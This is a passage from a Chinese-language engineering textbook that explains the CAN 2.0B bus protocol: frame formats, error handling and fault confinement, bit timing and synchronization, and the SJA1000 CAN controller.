①监视(发送器对发送位的电平与被监控的总线电平进行比较)。②循环冗余检查。③位填充。④报文格式检查。2)错误检测的执行(PerformanceofErrorDetection)。错误检测机制具有以下属性:①检测到所有的全局错误。②检测到发送器所有的局部错误。③可以检测到报文里多达5个任意分布的错误。④检测到报文里长度低于15(位)的突发性错误。⑤检测到报文里任一奇数个错误。(9)错误标定和恢复时间(ErrorSignallingandRecoveryTime)任何检测到错误的节点会标志出损坏的报文,此报文会失效并将自动重新传送。如果不再出现错误,那么从检测到错误到下一报文的传送开始为止,恢复时间最多为31个位的时间。(10)故障界定(FaultConfinement)CAN节点能够把永久故障和短暂的干扰区别开来,故障的节点会被关闭。(11)连接(Connections)CAN串行通信链路是可以连接许多单元的总线。理论上可连接无数个单元,但实际上由于受延迟时间以及总线线路上电气负载能力的影响,连接单元的数量是有限的。(12)单一通道(SingleChannel)总线由单一通道组成,它传输位流,从传输的数据中可以获得再同步信息。本技术规范没有规定通道实现通信的方法,例如,可以使用单芯线(加地线)、两条差分线和光缆等。(13)总线值的表示(BusValues)总线上可以有两个互补的逻辑值中的一个:“显性”或“隐性”。当显性位和隐性位同时传送时,其结果是总线值为显性。(14)应答(Acknowledgement)所有的接收器对接收到的报文进行一致性检查。对于一致的报文,接收器给予应答;对于不一致的报文,接收器加以标志。(15)休眠模式/唤醒(SleepMode/Wake⁃up)为了减少系统电源的功率消耗,可以将CAN器件设为休眠模式来停止内部活动并断开与总线驱动器的连接。休眠模式可以由于任何总线的运作或系统内部条件改变而结束。唤醒时,在总线驱动器被重新设置为“接通总线”之前,内部运行就已重新开始。然而MAC子层要等待系统的振荡器工作稳定后,还要等待到与总线活动同步(通过检查11个连续的隐性位)。(16)振荡器误差(OscillatorTolerance)位定时的精度要求允许在传输速率为125kbit/s以内的应用中使用陶瓷谐振器,为了满足CAN协议的整个总线速度范围,需要使用晶体振荡器。7.2.2报文传输1.帧格式CAN2.0B中有两种不同的帧格式,不同之处为标识符域的长度:含有11位标识符的帧称之为标准帧,含有29位标识符的帧称之为扩展帧。 2.帧类型报文传输有以下4种不同类型的帧:1)数据帧(DataFrame):数据帧将数据从发送器传输到接收器。2)远程帧(RemoteFrame):总线单元发出远程帧,请求发送具有同一标识符的数据帧。3)错误帧(ErrorFrame):任何单元检测到总线错误就发出错误帧。4)过载帧(OverloadFrame):过载帧用在相邻数据帧或远程帧之间提供附加的延时。数据帧和远程帧可以使用标准帧及扩展帧两种格式,它们用一个帧间空间与前面的帧分开。 1)数据帧数据帧由以下7个不同的位域(BitField)组成:帧起始(StartofFrame)、仲裁域(ArbitrationField)、控制域(ControlField)、数据域(DataField)、CRC域(CRCField)、应答域(ACKField)和帧结尾(EndofFrame)。数据域的长度可以为0。报文的数据帧结构如图7⁃3所示。1)帧起始(标准格式和扩展格式)。帧起始(SoF)标志数据帧和远程帧的起始,仅由一个显性位组成,只在总线空闲时才允许站点开始发送,所有的站必须同步于首先开始发送报文的站的帧起始前沿。2)仲裁域。标准格式帧与扩展格式帧的仲裁域格式不同。在标准格式里,仲裁域由11位标识符和RTR位组成,标识符位由ID.28~ID.18组成。数据帧标准格式中的仲裁域如图7⁃4所示。图7⁃4数据帧标准格式中的仲裁域结构在扩展格式里,仲裁域包括29位标识符、SRR位、IDE位和RTR位,其标识符由ID.28~ID.0组成。为了区别标准格式和扩展格式,前版本CAN规范(V1.0~V1.2)中的保留位r1现在表示为IDE位。数据帧扩展格式中的仲裁域如图7⁃5所示。①标识符。●标准格式中的标识符:标识符的长度为11位,相当于扩展格式的基本ID(BaseID)。这些位按ID.28到ID.18的顺序发送,最低位是ID.18,7个最高位(ID.28~ID.22)必须不能全为隐性。●扩展格式中的标识符:和标准格式对比,扩展格式的标识符由29位组成。其结构包含两部分:11位基本ID、18位扩展ID。基本ID:基本ID包括11位。它按ID.28到ID.18的顺序发送,相当于标准标识符的格式。基本ID定义了扩展帧的基本优先权。扩展ID:扩展ID包括18位,按ID.17到ID.0顺序发送。在标准帧里,标识符后面是RTR位。②RTR位(在标准格式和扩展格式中)。RTR位为“远程发送请求位”(RemoteTrans⁃missionRequestBit),在数据帧里必须为显性,而在远程帧里必须为隐性。在扩展帧里,基本ID首先发送,随后是SRR位和IDE位,扩展ID的发送位于IDE位之后。③SRR位(属扩展格式)。SRR位是“替代远程请求位”(SubstituteRemoteRequestBit)。SRR位是一隐性位,它在扩展格式的标准帧的RTR位的位置被发送,因而替代标准帧的RTR位。当标准帧与扩展帧发生冲突,而扩展帧的基本ID同标准帧的标识符一样时,标准帧优先于扩展帧。④IDE位(属扩展格式)。IDE位是“标识符扩展位”(IdentifierExtensionBit),它属于扩展格式的仲裁域和标准格式的控制域。标准格式里的IDE位为显性,而扩展格式里的IDE位为隐性。3)控制域(标准格式以及扩展格式)。控制域由6个位组成,其结构如图7⁃6所示。标准格式的控制域结构和扩展格式的不同,标准格式里的控制域包括数据长度代码、IDE位及保留位r0。扩展格式里的控制域包括数据长度代码和两个保留位:r1和r0,其保留位必须发送为显性,但是接收器接收的是显性和隐性位的组合。数据长度代码指示了数据域里的字节数目,为4个位,在控制域里发送。数据长度代码中数据字节数的编码为:缩写:d———显性(逻辑0);r———隐性(逻辑1)。数据帧长度允许的数据字节数:{0,1,…,7,8},其他数值不允许使用。4)数据域(标准格式和扩展格式)。数据域由数据帧里的发送数据组成,可以为0~8B,每字节包含8位,首先发送最高有效位(MSB)。5)循环冗余校验(CRC)域(标准格式和扩展格式)。CRC域包括CRC序列(CRCSequence),其后是CRC界定符(CRCDelimiter),如图7⁃7所示。①CRC序列(标准格式和扩展格式)。由循环冗余校验求得的帧检查序列最适用于位数低于127位(BCH码)的帧。为进行CRC计算,被除的多项式系数由无填充位流给定。组成这些位流的成分是:帧起始、仲裁域、控制域和数据域(如果存在),而15个最低位的系数是0。将此多项式除以下面的多项式发生器:x15+x14+x10+x8+x7+x4+x3+1这个多项式除法的余数就是发送到总线上的CRC序列。为了实现这个功能,可以使用15位的移位寄存器———CRC_RG(14∶0)。如果用NXTBIT标记指示位流的下一位,那么从帧的起始到数据域末尾都由没有填充的位序列给定。在传送/接收数据域的最后一位以后,CRC_RG包含有CRC顺序。②CRC界定符(标准格式和扩展格式)。CRC序列之后是CRC界定符,它包含一个单独的隐性位。6)应答域(ACKField)(标准格式和扩展格式)。应答域长度为2个位,包含应答间隙(ACKSlot)和应答界定符(ACKDelimiter),如图7⁃8所示。在应答域里,发送站发送2个隐性位,当接收器正确地接收到有效报文时,接收器就会在应答间隙期间(发送ACK信号)向发送器发送一显性位以示应答。 ①应答间隙。所有接收到匹配CRC序列的站会在应答间隙期间用一显性位写在发送器的隐性位置上来做出回应。②应答界定符。应答域的第2个位,并且必须是一个隐性位,因此,应答间隙被2个隐性位所包围,也就是CRC界定符和应答界定符。7)帧结尾(标准格式和扩展格式)。每一个数据帧和远程帧均由一标志序列界定,这个标志序列由7个隐性位组成。(2)远程帧作为某数据接收器的站,通过发送远程帧(RemoteFrame)可以启动其图7⁃9远程帧结构资源节点传送它们各自的数据。远程帧也有标准格式和扩展格式,而且都由6个不同的位域组成:帧起始、仲裁域、控制域、CRC域、应答域和帧结尾。与数据帧相反,远程帧的RTR位是隐性的,它没有数据域,所以数据长度代码的数值没有意义。远程帧结构如图7⁃9所示。RTR位的极性表示了所发送的帧是一数据帧(RTR位显性)还是一远程帧(RTR位隐性)。(3)错误帧错误帧由两个不同的域组成,如图7⁃10所示。第1个域是不同站提供的错误标志(ErrorFlag)的叠加(Superposition),第2个域是错误界定符(ErrorDelimiter)。为了能正确地中止错误帧,“错误认可”的节点要求总线至少有长度为3个位时间的总线空闲,因此,总线的载荷不应为100%。图7⁃10错误帧结构1)错误标志。有两种形式的错误标志:“激活(Active)错误”标志和“认可(Passive)错误”标志。①“激活错误”标志由6个连续的显性位组成。②“认可错误”标志由6个连续的隐性位组成,除非被其他节点的显性位覆盖。检测到错误条件的“错误激活”的站通过发送“激活错误”标志来指示错误,因为这个错误标志的格式违背了从帧的起始到CRC界定符的位填充规则,也破坏了ACK域或帧结尾域的固定格式。这样一来,所有其他的站会检测到错误条件并且开始发送错误标志,因此,这个显性位的序列的形成就是各个站发送的不同的错误标志叠加在一起的结果。这个序列的总长度最小为6个位,最大为12个位,可以在总线上监视到。检测到错误条件的“错误认可”的站试图通过发送“认可错误”标志来指示错误。“错误认可”的站从“认可错误”标志的开头起,等待6个连续的相同极性的位,当这6个相同的位被检测到时,“认可错误”标志就完成了2)错误界定符。错误界定符包括8个隐性位。传送了错误标志以后,每一个站就发送一个隐性位,并一直监视总线直到检测出一个隐性位为止,然后开始发送其余7个隐性位。图7⁃11过载帧结构(4)过载帧过载帧包括两个位域:过载标志和过载界定符,其结构如图7⁃11所示。有3种过载的情况会引发过载标志的传送,即1)接收器的内部原因,它需要延迟下一个数据帧或远程帧。2)在间歇(Intermission)的第1位和第2位检测到一个显性位。3)如果CAN节点在错误界定符或过载界定符的第8位采样到一个显性位,则节点会发送一个过载帧,该帧不是错误帧,错误计数器不会增加。由于过载情况1)而引发的过载帧只允许起始于所期望的间歇的第1个位时间,而由于情况2)和情况3)引发的过载帧起始于所检测到显性位之后的1个位。通常为了延迟下一个数据帧或远程帧,两种过载帧均可产生。1)过载标志(OverloadFlag)。过载标志由6个显性位组成,它的所有形式和“激活错误”标志都一样。由于过载标志的格式破坏了间歇域的固定格式,因此,所有其他的站都检测到过载条件,并与此同时发出过载标志。如果在间歇的第3个位期间检测到显性位,则这个位将被解释为帧的起始。2)过载界定符(OverloadDelimiter)。过载界定符包括8个隐性位,它的形式和错误界定符的形式一样。过载标志被传送后,站就一直监视总线,直到检测到一个从显性位到隐性位的跳变为止。在这一时刻,总线上的每一个站完成了各自过载标志的发送,并开始同时发送其余7个隐性位。(5)帧间空间数据帧(或远程帧)与它前面帧的分隔是通过帧间空间(InterframeSpace)来实现的,无论前面的帧是何种类型。不同的是,过载帧与错误帧之前没有帧间空间,多个过载帧之间也不是由帧间空间隔离的。帧间空间包括“间歇”“总线空闲(BusIdle)”的位域,如果是发送前一报文的“错误认可”站,则还包括称作“挂起传送”(暂停发送)(SuspendTransmission)的位域。对于不是“错误认可”的站,或作为前一报文的接收器的站,其帧间空间结构如图7⁃12所示。对于已作为前一报文发送器的“错误认可”的站,其帧间空间结构如图7⁃13所示。 1)间歇。间歇由3个隐性位组成,在间歇期间,所有的站均不允许传送数据帧或远程帧,唯一可做的是标识一个过载条件。2)总线空闲的时间是任意的。只要总线被认定为空闲,任何等待发送报文的站就会访问总线。在发送其他报文期间,一个等待发送的报文,其传送开始于间歇之后的第1个位。总线上检测到的显性位可被解释为帧的起始。3)挂起传送。挂起传送指“错误认可”的站发送报文后,在下一报文开始传送之前或确认总线空闲之前发出8个隐性位跟随在间歇的后面。如果与此同时一个报文由另一站开始发送,则此站就成为这个报文的接收器。3.关于帧格式的一致性在CAN规范V1.2中,标准格式等效于数据/远程帧格式,然而,扩展格式是CAN协议的新特性。为了可以设计相对简单的控制器,扩展格式的执行不要求它完整地扩展,但是必须支持标准格式而没有限制。如果新的控制器至少具备在2.0A和2.0B版本中定义的下列有关帧格式的属性,它们就被认为与这个CAN规范一致:1)每一个新的控制器均支持标准格式。2)每一个新的控制器均能够接收扩展格式的报文。这要求扩展帧不会因为它们的格式而受破坏,虽然不要求新控制器必须支持扩展帧。4.发送器和接收器的定义(1)发送器产生报文的单元称作这个报文的发送器。当总线空闲或该单元失去仲裁时,这个单元就不是发送器。(2)接收器如果一个单元不是发送器,同时总线也不空闲,则这个单元就称作接收器。7.2.3报文滤波与报文校验1.报文滤波(MessageFiltering)报文滤波取决于整个标识符。为了报文滤波,允许把屏蔽寄存器中任何标识符位设置为“不考虑”或“无关”,可以用这种寄存器选择多组标识符,使之与相关的接收缓冲器对应。在使用屏蔽寄存器时,它的每一个位都是可编程的,也就是说,对于报文滤波,可将它们设置为允许或禁止。屏蔽寄存器的长度可以包含整个标识符,也可以是部分标识符。2.报文校验校验报文有效的时间点,对于发送器与接收器来说各不相同。发送器:如果直到帧的末尾位仍没有错误,则此报文对于发送器有效。如果报文出错,则报文会根据优先权自动重发。为了能够和其他报文竞争总线,必须当总线一空闲时就开始重新传输报文。接收器:如果直到最后的位(除了帧末尾位)仍没有错误,则报文对于接收器有效。帧末尾最后的位被置于“不考虑”状态,即使是一个显性电平也不会引起格式错误。 7.2.4编码与错误处理1.编码编码即位流编码(BitStreamCoding)。帧的如下部分:帧起始、仲裁域、控制域、数据域以及CRC序列,均通过位填充的方法编码。无论何时,发送器只要检测到位流里有5个连续相同值的位,便自动在位流里插入一个相反值的补充位。数据帧或远程帧的其余位域(CRC界定符、应答域和帧结尾)格式固定,没有填充。错误帧和过载帧的格式也固定,它们不用位填充的方法编码。报文的位流根据“不归零”(NRZ)方法来编码,这就是说,在整个位时间里,位的电平或者为显性,或者为隐性。2.错误处理(1)错误检测有以下5种不同的错误类型:1)位错误(BitError)。单元在发送位的同时也对总线进行监视。如果所发送的位值与所监视的位值不相符,则在此位时间里检测到一个位错误。但是在仲裁域的填充位流期间或应答间隙发送一隐性位的情况是例外的,此时,当监视到一显性位时,不会发出位错误。当发送器发送一个“认可错误”标志但检测到显性位时,也不视为位错误。2)填充错误(StuffError)。在应当使用位填充法进行编码的报文域中,出现了第6个连续相同的位电平时,将检测到一个填充错误。3)CRC错误(CRCError)。CRC序列包括了发送器计算的CRC结果。接收器计算CRC的方法与发送器相同,如果计算结果与接收到CRC序列的结果不相符,则检测到一个CRC错误。4)格式错误(FormError)。如果一个固定格式的位域含有1个或多个非法位,则检测到一个格式错误。5)应答错误(AcknowledgementError)。只要在应答间隙期间所监视的位不为显性,发送器就会检测到一个应答错误。(2)出错时发出的信号检测到错误条件的站通过发送“错误标志”(ErrorFlag)来表示错误。对于“错误激活”的节点,它是“激活错误”标志;对于“错误认可”的节点,它是“认可错误”标志。无论是位错误、填充错误、格式错误还是应答错误,只要被任何站检测到,这个站就会在下一位时开始发出“错误标志”。只要检测到错误的条件是CRC错误,那么“错误标志”的发送就开始于ACK界定符之后的位。7.2.5故障界定与振荡器容差1.故障界定有关故障界定,一个单元的状态可能为以下3种之一:“错误激活”(ErrorActive)、“错误认可”(ErrorPassive)和“总线关闭”(BusOff)。“错误激活”的单元可以正常地参与总线通信,并在检测到错误时发出“激活错误”标志。“错误认可”的单元不允许发送“激活错误”标志。“错误认可”的单元参与总线通信,在检测到错误时只发出“认可错误”标志,并且发送以后,“错误认可”单元将在启动下一个发送之前处于等待状态。“总线关闭”的单元不允许对总线有任何影响。 在每一总线单元中使用两种计数来进行故障界定:发送错误计数和接收错误计数。这些计数按以下规则改变:1)当接收器检测到一个错误时,接收错误计数器值就加1。在发送“激活错误”标志或过载标志期间所检测到的错误为位错误时,接收错误计数器值不加1。2)在错误标志发送以后,接收器检测到的第一个位为显性时,接收错误计数器值加8。3)在发送器发送一错误标志时,发送错误计数器值加8。①例外情况1:如果发送器为“错误认可”,并检测到应答错误,其原因是检测不到显性ACK,以及当发送它的“认可错误”标志时检测不到显性位。②例外情况2:如果发送器因为在仲裁期间发生填充错误而发送错误标志,以及应当是隐性并且已作为隐性发送,但是却被监视为显性。当例外情况1和例外情况2发生时,发送错误计数器值不改变。4)当发送器发送“激活错误”标志或过载标志时,如果发送器检测到位错误,则发送错误计数器值加8。5)当接收器发送“激活错误”标志或过载标志时,如果接收器检测到位错误,则接收错误计数器值加8。6)在发送“激活错误”标志、“认可错误”标志或过载标志以后,任何节点最多允许7个连续的显性位。当检测到第14个连续的显性位后,或在检测到第8个连续的显性位跟随在“认可错误”标志后,以及在每一个附加的8个连续显性位序列后,每一个发送器的发送错误计数器值加8,每一个接收器的接收错误计数值也加8。7)报文成功地传送后,发送错误计数器值减1,除非计数值已经是0。8)成功地接收到报文后,如果接收错误计数器值为1~127,则接收错误计数器值减1;如果接收错误计数器值是0,则它保持0;如果大于127,则它会设置一个119~127的值。9)当发送错误计数器值等于或大于128,或当接收错误计数器值等于或大于128时,节点为“错误认可”状态,使节点成为“错误认可”的错误条件将导致该节点发出“激活错误”标志。图7⁃14故障状态图解10)当发送错误计数器值大于或等于256时,该节点处于“总线关闭”状态。11)当发送错误计数器值和接收错误计数器值都小于或等于127时,“错误认可”节点重新变为“错误激活”节点。12)在总线上监视到128次出现11个连续隐性位之后,“总线关闭”的节点可以变成“错误激活”节点,它的两个错误计数器值也被设置为0。在运行中,上述3类故障状态之间的相互转变过程如图7⁃14所示。2.振荡器容差由于给定的最大振荡器容差为±1.58%,因此,一般在传输速率低于125kbit/s的应用中可使用陶瓷谐振器。为了满足CAN协议的整个总线速度范围,需要使用石英晶振。在一个系统中,具有最高振荡精确度要求的芯片,决定了其他节点的振荡精度。对于使用2.0B版本及以前版本CAN规范的控制器,当它们运行在一个网络中时,都必须配备石英晶振。7.2.6位定时要求1.标称位速率(NominalBitRate)标称位速率为一理想的发送器在没有重新同步的情况下每秒发送的位数量。图7⁃15标称位时间的划分2.标称位时间(NominalBitTime)标称位时间=1/标称位速率可以把标称位时间划分为几个不重叠时间的片段,它们是同步段、传播段、相位缓冲段1和相位缓冲段2,如图7⁃15所示。1)同步段(SYNC_SEG)。位时间的同步段用于同步总线上不同的节点,这一段内要有一个跳变沿。2)传播段(PROP_SEG)。传播段用于补偿网络内的物理延时时间,它是信号在总线传播的时间、输入比较器延时和输出驱动器延时总和的两倍。3)相位缓冲段1、相位缓冲段2(PHASE_SEG1、PHASE_SEG2)。相位缓冲段用于补偿边沿阶段的误差,这两个段可以通过重新同步来加长或缩短。4)采样点(SamplePoint)。采样点是读取总线电平并转换为对应位值的一个时间点,采样点位于相位缓冲段1的结尾。3.信息处理时间(InformationProcessingTime)信息处理时间是一个以采样点作为起始的时间段,它被保留用于计算后续位的位电平。4.时间份额TQ(TimeQuantum)时间份额是从振荡器周期派生而来的一个固定时间单位,这里存在一个可编程的预比例因子,其数值范围为1~32之间的整数。以最小时间份额为起点,时间份额的长度为时间份额=m×最小时间份额式中,m为预比例因子。5.时间段的长度(LengthofTimeSegments)1)同步段为1个时间份额(TQ)。2)传播段的长度可设置为1、2、…、8个时间份额(TQ)。3)相位缓冲段1的长度可设置为1、2、…、8个时间份额(TQ)。4)相位缓冲段2的长度为相位缓冲段1和信息处理时间的最大值。5)信息处理时间小于或等于2个时间份额(TQ)。1个位时间总的时间份额值可以编程为3~25的范围。1)硬同步(HardSynchronization)。一个硬同步后,内部的位时间从同步段重新开始,因此,硬同步迫使引起硬同步的跳变沿位于重新开始的位时间同步段之内。2)重新同步跳转宽度(ResynchronizationJumpWidth)。重新同步的结果使相位缓冲段1增长,或使相位缓冲段2缩短。相位缓冲段加长或缩短的数量有一个上限,此上限由重新同步跳转宽度给定。重新同步跳转宽度应设置于1和最小值之间(此最小值为4和PHASE_SEG1之间的最小值)。可以从一位值到另一位值的转变中提取时钟信息。只有一个固定的最大数量的连续位具有相同的值,这个属性使总线单元在帧内重新同步于位流成为可能,可用于重新同步的两个跳变之间的最大长度为29个位时间。3)边沿的相位误差(PhaseErrorofanEdge)。一个边沿的相位误差由相对于同步段边沿的位置给出,以时间份额度量。相位误差e定义如下:①e=0,如果边沿处于同步段中(SYNC_SEG)。②e>0,如果边沿位于采样点(SamplePoint)之前。③e<0,如果边沿处于前一个位的采样点之后。4)重新同步(Resynchronization)。当引起重新同步的边沿相位误差的值小于或等于重新同步跳转宽度的编程值时,重新同步和硬同步的作用相同。当相位误差的值大于重新同步跳转宽度时,如果相位误差为正,则相位缓冲段1就增长一个重新同步跳转宽度的值;如果相位误差为负,则相位缓冲段2就缩短一个重新同步跳转宽度的值。5)同步的规则(SynchronizationRules)。硬同步和重新同步是同步的两种形式,应遵循以下同步的规则:①在一个位时间里只允许一个同步。②仅当采样点之前探测到的值与紧跟边沿之后的总线值不相符合时,才把边沿用于同步。③在总线空闲期间,无论何时有一由隐性转变到显性的边沿,就会执行硬同步。④符合规则①和规则②的所有其他从隐性转变为显性的边沿都可用于重新同步。例外情况是,如果只有隐性到显性的边沿用于重新同步时,则一个发送显性位的节点将不会执行如同具有正相位误差的由隐性转变为显性的边沿所引起的那种重新同步。7.3CAN器件及节点设计7.3.1独立CAN控制器目前,一些知名的半导体厂商都生产CAN控制器芯片,其类型一种是独立的,一种是和微处理器集成在一起的。如独立的CAN通信控制器有SJA1000、PCA82C200、Intel82526/82527等;带CAN通信控制器的CPU有西门子的SAB⁃C505C、TI的TMS320LF2407、NXP的P87C591等。P87C591是一个单片8位高性能微控制器,具有片内CAN控制器,采用了强大的80C51指令集并成功地包含了SJA1000CAN控制器强大的PeliCAN功能。独立的CAN通信控制器使用上比较灵活,可以与多种类型的单片机、微型计算机的各类标准总线进行接口组合,带CAN通信控制器的CPU在许多特定情况下,使电路设计简化和紧凑,效率提高。1.SJA1000芯片概述SJA1000是一种独立的CAN控制器,主要用于移动目标和一般工业环境中的区域网络控制。它是飞利浦半导体公司PCA82C200CAN控制器(BasicCAN)的替代产品,而且还增加了一种新的操作模式———PeliCAN,这种模式支持具有很多新特性的CANV2.0B协议。SJA1000的基本特性如下:1)引脚与PCA82C200独立CAN控制器兼容。2)电气参数与PCA82C200独立CAN控制器兼容。3)具有PCA82C200模式(即默认的BasicCAN模式)。4)有扩展的接收缓冲器64B,先进先出(FIFO)。5)支持CANV2.0A和CANV2.0B协议。6)支持11位和29位标识码。7)通信位速率可达1Mbit/s。8)PeliCAN模式的扩展功能有:①可读/写访问的错误计数寄存器。②可编程的错误报警限额寄存器。③最近一次错误代码寄存器。④对每一个CAN总线错误的中断。⑤有具体位控制的仲裁丢失中断。⑥单次发送(无重发)。⑦只听模式(无确认、无激活的错误标志)。⑧支持热插拔(软件进行位速率检测)。⑨验收滤波器的扩展(4B的验收代码,4B的屏蔽)。⑩接收自身报文(自接收请求)。9)24MHz时钟频率。10)支持与不同微处理器的接口。11)可编程的CAN输出驱动器配置。12)温度适应范围大(-40~+125℃)。2.SJA1000在系统中的位置SJA1000在系统中的位置如图7⁃16和图7⁃17所示,可以初步了解CAN控制器在现场总线系统中的位置和所起的作用。图7⁃16CAN控制器SJA1000在系统中的位置3.SJA1000的几个控制模块(1)接口管理逻辑(IML)接口管理逻辑用于解释来自CPU的命令,控制CAN寄存器的寻址,向主控制器(CPU)提供中断信息和状态信息。(2)发送缓冲器(TXB)发送缓冲器是CPU和BSP(位流处理器)之间的接口,它能够存储要通过CAN网络发送的一条完整报文。缓冲器长13B,由CPU写入、BSP读出。(3)接收缓冲器(RXB、RXFIFO)接收缓冲器是验收滤波器和CPU之间的接口,用来存储从CAN总线上接收并被确认的信息。接收缓冲器(RXB,13B)作为接收FIFO(RXFIFO,64B)的一个窗口,可被CPU访问。CPU在此FIFO的支持下,可以在处理一条报文的同时接收其他报文。(4)验收滤波器(ACF)验收滤波器把它的内容与接收到的标识码相比较,以决定是否接收这条报文。在验收测试通过后,这条完整的报文就被保存在RXFIFO中。(5)位流处理器(BSP)位流处理器是一个在发送缓冲器、RXFIFO和CAN总线之间控制数据流的队列(序列)发生器,它还执行CAN总线上错误检测、仲裁、填充和错误处理。(6)位时序逻辑(BTL)位时序逻辑监视串口的CAN总线和处理与总线有关的位时序。它是在一条报文开头,总线传输出现从隐性到显性时同步于CAN总线上的位流(硬同步),并且在其后接收一条报文的传输过程中再同步(软同步)。BTL还提供了可编程的时间段来补偿传播延时、相位偏移(例如,由于振荡器漂移)及定义采样点和每一位的采样次数。(7)错误管理逻辑(EML)错误管理逻辑负责限制传输层模块的错误。它接收来自BSP的出错报告,然后把有关错误统计告诉BSP和IML。4.SJA1000位周期参数的确定编程配置总线时序寄存器0/1时要考虑:一个位周期包含有同步段(SYNC_SEG)、时间段1(TSEG1)和时间段2(TSEG2);涉及同步跳转宽度(SJW)和采样点的位置;组成它们的最小单元是CAN系统时钟周期tSCL,即TQ。这些参数都是可编程的,为此,即使在同样晶振频率条件下设置一个波特率,上述参数的组合也可以是多样的。文中所涉及的几个参数数学表达式和取值范围如下:1)时间份额:TQ=tSCL。2)同步段:SYNC_SEG=tSYNC_SEG/tSCL=1,取值为1。3)同步跳转宽度:SJW=tSJW/tSCL,取值范围为1~4。4)时间段1:TSEG1=tTSEG1/tSCL,取值范围为1~16。5)时间段2:TSEG2=tTSEG2/tSCL,取值范围为1~8。6)标准定位时间NBT:取值范围为3~25,计算式为NBT=tbit/tSCL=SYNC_SEG+TSEG1+TSEG2(7⁃1)式中,tbit为额定位周期;tSCL为系统时钟周期。7)振荡器频率相对误差: Δf=fCLK.max/min-fCLK.nomfCLK.nom(7⁃2)式中,fCLK.max/min为振荡器最大/最小频率;fCLK.nom为振荡器基准频率。 (1)传播延时在CAN系统中,传播延时的意义来源于CAN允许节点间为了访问网络进行非破坏性仲裁竞争,也因为在帧中有应答设置。仲裁发生在标识符段,意味着多个节点同时把它们的标识位送到总线。由于各节点在位边沿同步,所以传播延时过长会在系统中引起无效的仲裁,结果是,一个CAN系统中不同的延时限制了在某给定位速率时网络总线的最大长度。把节点A和B之间的延时定义为tprop(A,B),一种情况如图7⁃18所示。该延时是信号的路径上所有器件延时的总和,包括收发器、CAN控制器和总线介质。通常,一个有效的最大环路延时tloop.eff在控制器和收发器的资料手册中有相关规定。一个收发器的有效回路延时计算为tloop.eff.trc=tTX+tRX(7⁃3)式中,tloop.eff.trc为收发器有效回路延时;tTX为引脚TXD发送数据输入有效循环延时;tRX为引脚RXD接收数据输出有效循环延时。节点要能相互接收波动信号,而且在仲裁期间要能同步于它们并且可以将其发送回去。在该系统中,总的传播延时是两个节点延时的总和。假设一个已知的网络中每一个节点都有类似的延时,则总的回路延时定义为tprop,表达式为tprop=tprop(A,B)+tprop(B,A)=2(tbus+tloop.eff.trc+tloop.eff.oth)(7⁃4)式中,tbus为总线延时,tloop.eff.oth为传输通路上其他元件的有效循环延时。这里tprop是所有器件有效环路延时的总和,计算位定时时该总的回路延时是重要的因数。在应用实例中,它必须由特定的系统条件决定。这里位定时的计算,要求规范化的传播延时定义为PROP=tproptSCL(7⁃5)当该规范化的传播延时等于一个可编程序控制器的时间间隔时,它必须是一个整数值。(2)同步CAN总线规范中所描述的同步是为了保证报文可以完整地解码,该技术可以清除节点之间相位误差的积累。由于振荡器的漂移,分布于网络空间的节点间传播延时以及噪声干扰都会产生相位误差。该规范定义了两类同步:硬同步和重新同步。硬同步只出现在报文帧开始时,在一个空闲周期后,网络上的每一个CAN控制器在接收到的SYNC_SEG第一个隐性到显性位的边沿开始它当前的位周期定时。重新同步是执行在后续每次接收到隐性到显性位的边沿,它贯穿在报文的剩余部分。如果该边沿是在TSEG1期间接收到,即在接收器的SYNC_SEG之后而在采样点之前,则接收器认为它是一个较慢发送器发送的滞后边沿,因此这个接收器的TSEG1段就会延长,目的是较好地匹配那个发送器的时序。相反,如果接收到这个边沿是在接收器的采样点之后而在SYNC_SEG之前,也就是在TSEG2期间,则接收器认为这个边沿是一个较快的发送器发送的下一个位周期的提前边沿。在这种情况下,该接收器就缩短TSEG2间隔,目的是更好地匹配那个较快的发送器时序。在重新同步期间由SJW的编程值决定延长或缩短的最大TQ数目。由于在CAN的位周期中所有各段都被量化,即包含了整数个TQ,所以重新同步只出现在相位的绝对误差大于1个TQ时。因此,即使在网络中两个节点之间有严格的相同振荡器参考频率,同步中也会存在TQ的不确定性。 (3)位定时条件的说明对一个CAN系统的最低要求是:第一,若在指定的频率误差中两个节点有各自相反的振荡器标准,而又在各自网络的两端,则它们之间具有最大的传播延时;第二,能够正确地接收和解码网络中发送的每一个报文。在没有噪声干扰的情况下,位填充的原则保证了在重新同步边沿之间不会多于10个位周期(即5个显性位后跟5个隐性位),这是在正常通信期间由于累积的相位误差引起的最坏情况。该相位误差由编程的同步跳转宽度(SJW)来补偿,同时也定义了SJW使用最小值的条件。实际系统一般都运行在噪声存在的环境中。噪声干扰会引起CAN的错误模式,会导致在两次重新同步边沿之间有10多个位周期。这种情况下,由于在同步边沿之间的时间更长了,因此要求更严格地对所有位进行恰当的采样,否则就会出现CAN协议中定义的错误检测和错误限制状况出现,这样就限定了在位时序中TSEG2段可供选择的值。(4)计算规则位定时的计算公式汇集见表7⁃3(1次采样模式)和表7⁃4(3次采样模式),位定时的参数SJW和TSEG2的计算应当依据系统的标称位时间(NBT)和传播延时(PROP)。当计算SJW最小值时,一般会出现两个不同的值。 (5)计算规则的图解表示方式设计一个CAN的基本系统时,关键是要明确地指定:1)位速率,决定了在一定时间内数据发送的量。2)传播延时,决定了系统中任意两个节点之间总线的最大长度。另一个重要的决定是在位周期中采样点放在什么地方。若选择采样点靠近后面,将使得传播延时的变化范围比较大,也就是会有较长的总线长度;相反,若选择采样点在前面,就会有较大的振荡器容差。系统参数是否满足特定的CAN总线运行的要求,如图7⁃20和图7⁃21所示,此图解也可用作确定位定时参数。1)说明和限制。该图解在下列条件下有效:①用1次采样模式。②PROPmin≥2。③TSEG2min=SJWmin。如果这些假设不满足,则要使用表7⁃3和表7⁃4中的公式来计算。2)最大位速率的确定。很明显,较高的位速率只有在系统传播延时较小的情况下才能实现。系统的最大位速率是由NBT最小的持续时间决定的。最大位速率由(7⁃16)计算: 